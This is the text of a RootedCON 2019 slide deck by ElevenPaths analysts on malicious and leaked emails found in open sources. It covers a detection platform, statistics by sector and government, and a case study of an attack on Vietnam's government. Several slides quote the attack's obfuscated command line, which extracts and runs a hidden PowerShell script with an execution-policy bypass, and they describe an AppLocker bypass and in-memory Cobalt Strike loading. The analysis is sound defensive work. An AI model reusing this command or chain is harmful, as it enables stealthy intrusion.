Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Miguel Ángel de Castro & Pablo San Emeterio - Another Bad Email :-( [rooted2019]

201 views

Published on

Miguel Ángel de Castro & Pablo San Emeterio - Another Bad Email :-( [rooted2019]

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Miguel Ángel de Castro & Pablo San Emeterio - Another Bad Email :-( [rooted2019]

  1. 1. 1RootedCON 2019 An Other Bad Email /RootedCON Madrid 2019
  2. 2. 2RootedCON 2019 ¿Quienes somos? Miguel Ángel de Castro Senior Cyberthreats Analyst en ElevenPaths (Telefónica) Pablo San Emeterio Innovation Analyst & CSA ElevenPaths (Telefónica)
  3. 3. 3RootedCON 2019 email Email! Email! Email!
  4. 4. 4RootedCON 2019 Emails en Fuente abierta… fuga de datos…. From emails To emails Subjects Adjuntos Body:(passwords,contexto, INFORMACIÓN….) Etc….. ……
  5. 5. 5RootedCON 2019 ---DISCLAIMER--- The contents of this E-mail (including the contents of the enclosure/(s) or attachment/(s) if any) are privileged and confidential material of Mahindra and Mahindra Limited and should not be disclosed to, used by or copied in any manner by anyone other than the intended addressee/(s). If this E-mail (including the enclosure/(s) or attachment/(s) if any ) has been received in error, please advise the sender immediately and delete it from your system. The views expressed in this E-mail message (including the enclosure/(s) or attachment/(s) if any) are those of the individual sender. Emails en Fuente abierta… fuga de datos…
  6. 6. 6RootedCON 2019 Malware Banco Pakistan
  7. 7. 7RootedCON 2019 El origen… Bancos Pakistan YARA
  8. 8. 8RootedCON 2019 Malware Banco Pakistan Description: Adwind es un RAT basado en Java que se instala silenciosamente y se conecta a un sitio remoto a través de un puerto preconfigurado para recibir comandos del atacante remoto. Cuando está activo, es capaz de robar información de usuario y también puede utilizarse para distribuir otro malware.
  9. 9. 9RootedCON 2019 MAIL MINCER
  10. 10. 10RootedCON 2019 MAIL MINCER: Arquitectura PLATAFORMA DE HUNTING EN SISTEMA DATA ANALITYC PROCESAMIENTO ML: DIARIO SANDBOX: WILDFIRE PALOALTO AV: VIRUSTOTAL Cabeceras Adjuntos Contenido Etc… • Tecnología interna. • Permite analizar documentos ofimáticos y PDF • Sin necesidad de subir el archivo completo. Analiza protegiendo la privacidad. • No utiliza tecnología antivirus, sino un sistema de predicción propio basado en Machine Learning • Permite para el analista bucear por los datos de todos esos documentos, sin conocer su contenido ni quién lo subió, solo los datos relevantes para una investigación
  11. 11. 11RootedCON 2019 MAIL MINCER: Tabla resultados
  12. 12. 12RootedCON 2019 MAIL MINCER: Dashboard
  13. 13. 13RootedCON 2019 MAIL MINCER: Dashboard
  14. 14. 14RootedCON 2019 DIARIO
  15. 15. 15RootedCON 2019 DIARIO
  16. 16. 16RootedCON 2019 DIARIO
  17. 17. 17RootedCON 2019 DIARIO Quien esté interesado en acceder al panel o la API, que se dirija a diario.e-paths.com y que escriba a labs@11paths.com identificándose como RootedXEdition.
  18. 18. 18RootedCON 2019 ANÁLISIS ESTADÍSTICO
  19. 19. 19RootedCON 2019 Tipos de ficheros País primer envío a VT Resultados estadisticos (4 meses) Elementos procesados
  20. 20. 21RootedCON 2019 Top 30 de adjunto 1 Top 30 de adjunto 2 Top 30 de asuntos Resultados estadisticos (4 meses) Elementos procesados
  21. 21. 22RootedCON 2019 Top 20 From emails Resultados estadisticos (4 meses) Elementos procesados
  22. 22. 23RootedCON 2019 Bottom 20 From emails solo 1 email Resultados estadisticos (4 meses) Elementos procesados
  23. 23. 24RootedCON 2019 Top 20 To emails Resultados estadisticos (4 meses) Elementos procesados
  24. 24. 25RootedCON 2019 Bottom 20 To emails solo 1 email Resultados estadisticos (4 meses) Elementos procesados
  25. 25. 26RootedCON 2019 Top 25 From: dominios .es Resultados estadisticos (4 meses) Elementos procesados Banca Alimentación Construcción Marketing Industrial Alimentación LimpiezaBanca Banca Industrial Logística Universidad Servicios Industrial Industrial Alimentación Servicios Empresarial Universidad
  26. 26. 27RootedCON 2019 Top 25 To: dominios .es Resultados estadisticos (4 meses) Elementos procesados Consultoría Consultoría Transportes Gestión Telco Informática Logística Construcción Automoción Limpieza Industrial Ciberseguridad Servicios
  27. 27. 28RootedCON 2019 SECTORES
  28. 28. 29RootedCON 2019 Resultados estadisticos: Sector Banca Distribución por paísesTOP de usuarios de VT que suben emails
  29. 29. 30RootedCON 2019 Resultados estadisticos: Sector Banca
  30. 30. 31RootedCON 2019 Resultados estadisticos: Sector Banca
  31. 31. 32RootedCON 2019 Resultados estadisticos: Sector Telco Distribución por paísesTOP de usuarios de VT que suben emails
  32. 32. 33RootedCON 2019 Resultados estadisticos: Sector Telco
  33. 33. 34RootedCON 2019 Resultados estadisticos: Sector Telco
  34. 34. 35RootedCON 2019 Resultados estadisticos: cuentas “publicas” Distribución por paísesTOP de usuarios de VT que suben emails
  35. 35. 36RootedCON 2019 Resultados estadisticos: cuentas “publicas” DOMINIOS RECEPTORES DE EMAILS DOMINIOS ENVIADORES DE EMAILS
  36. 36. 37RootedCON 2019 Resultados estadisticos: cuentas “publicas”
  37. 37. 38RootedCON 2019 GOBIERNOS
  38. 38. 39RootedCON 2019 Análisis .gov DOMINIOS .GOV RECEPTORES DE EMAIL CUENTAS QUE ENVIAN EMAIL A DOMINIOS .GOV Total: 531 emails 270 44
  39. 39. 40RootedCON 2019 Análisis .gov Total: 531 emails 270 PAISES QUE MANDAN A FUENTE PUBLICA EMAILS .GOV 184 142 CUENTAS VT QUE MANDAN A FUENTE PUBLICA EMAILS .GOV 207 153 44
  40. 40. 41RootedCON 2019 Análisis .gov Total: 531 emails 0 DETECCIONES EN VIRUSTOTAL 270 DETECCIONES EN VIRUSTOTAL > 1 180 241 82 NUMERO POSITIVOS EN VIRUSTOTALTIPOS DE FICHERO EN ADJUNTOS 64 5 12 6
  41. 41. 42RootedCON 2019 Análisis .gov JUNTAMOS TODAS LAS ANALÍTICAS
  42. 42. 43RootedCON 2019 184 142 207 APARECEN LAS SINGULARIDADES!!Análisis .gov
  43. 43. 44RootedCON 2019 142 207 Ataque sofisticado al gobierno de Vietnam
  44. 44. 45RootedCON 2019 184 142 207 %comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam 2019.doc.lnk">%temp%%windir:~- 1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~- 1,1%.ps1&for /f "delims==" %i in ('dir "%temp DOS FUSCATION + FILE CARVING + FILESS POWERSHELL + AppLocker Bypass + Cobalt .net inyecta en memoria cobalt Intalador legitimo .net para AppLocker Bypass Decoy file Ataque sofisticado al gobierno de Vietnam
  45. 45. 46RootedCON 2019 184 142 207 %comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam 2019.doc.lnk">%temp%%windir:~- 1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~- 1,1%.ps1&for /f "delims==" %i in ('dir "%temp C:Windowssystem32cmd.exe /c findstring /b /i "iex" C:UsersAdminDesktopattachment_toolTKCT quy I nam 2019.doc.lnk powershell.exe bypass -file C:UsersAdminAppDataLocalTemps.ps1 DOS OFUSCATION DECODIFICADO FILE CARVING Ataque sofisticado al gobierno de Vietnam
  46. 46. 47RootedCON 2019 184 142 207 %comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam 2019.doc.lnk">%temp%%windir:~- 1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~- 1,1%.ps1&for /f "delims==" %i in ('dir "%temp Ataque sofisticado al gobierno de Vietnam
  47. 47. 48RootedCON 2019 184 142 207 .net inyecta en memoria cobalt Intalador legitimo .net para AppLocker Bypass Decoy file Ataque sofisticado al gobierno de Vietnam
  48. 48. 49RootedCON 2019 184 Ataque sofisticado al gobierno de Vietnam
  49. 49. 50RootedCON 2019 184 207 Ataque sofisticado al gobierno de Vietnam
  50. 50. 51RootedCON 2019 184 Instalador legitimo .net para AppLocker Bypass que carga el binario compilado .NET Ataque sofisticado al gobierno de Vietnam
  51. 51. 52RootedCON 2019 184 142 207 Ataque sofisticado al gobierno de Vietnam .NET inyecta en memoria cobalt
  52. 52. 53RootedCON 2019 184 142 207 .NET inyecta en memoria cobalt Ataque sofisticado al gobierno de Vietnam
  53. 53. 54RootedCON 2019 142 207 .NET inyecta en memoria cobalt Ataque sofisticado al gobierno de Vietnam
  54. 54. 55RootedCON 2019 184 142 207 Ataque sofisticado al gobierno de Vietnam COBALT
  55. 55. 56RootedCON 2019 184 142 207 Ataque sofisticado al gobierno de Vietnam
  56. 56. 57RootedCON 2019 CONCLUSIONES
  57. 57. 58RootedCON 2019 184 142 207 • EL EMAIL ES UNO DE LOS PRINCIPALES VECTORES DE ENTRADA A UNA ORGANIZACIÓN, LOS CONTROLES PREVIOS NO SON SUFICIENTEMENTE EFECTIVOS. • EXISTEN MUCHOS CORREOS ACCESIBLES EN FUENTE ABIERTA ACCESIBLES PARA CUALQUIERA, ESTO PERMITEACCEDER A INFORMACIÓN SENSIBLE DE UNA ORGANIZACIÓN Y REALIZAR PERFILADO DE LA MISMA. • LA VARIEDAD DE MALWARE ENCONTRADO ES AMPLIA, CON MUCHA PRESENCIA DE EMOTET • LAS TÉCNICAS MAS INTERESANTES ENCONTRADAS PARA EVITAR LA DETECCIÓN POR AV, SANDBOX O ML SON: • ADJUNTOS COMPRIMIDOS CON UNA PASSWORD PRESENTE EN EL PROPIO EMAIL • FILESS MEDIANTE POWERSHELL • DOS-FUSCATION • EXPLOITS EN DOCUMENTOS OFIMÁTICOS Y PDF • APPLOCKER BYPASS • LOS ATACANTES DEDICAN MÁS ESFUERZO AL DESPLIEGUE DEL MALWARE PARA NO SER DETECTADOS QUE AL DESARROLLO DE NUEVAS PIEZAS DE MALWARE´ Analisis .gov
  58. 58. 59RootedCON 2019 184 142 207 Agradecimientos
  59. 59. 60RootedCON 2019 Q&A
  60. 60. 61RootedCON 2019 Muchas gracias

×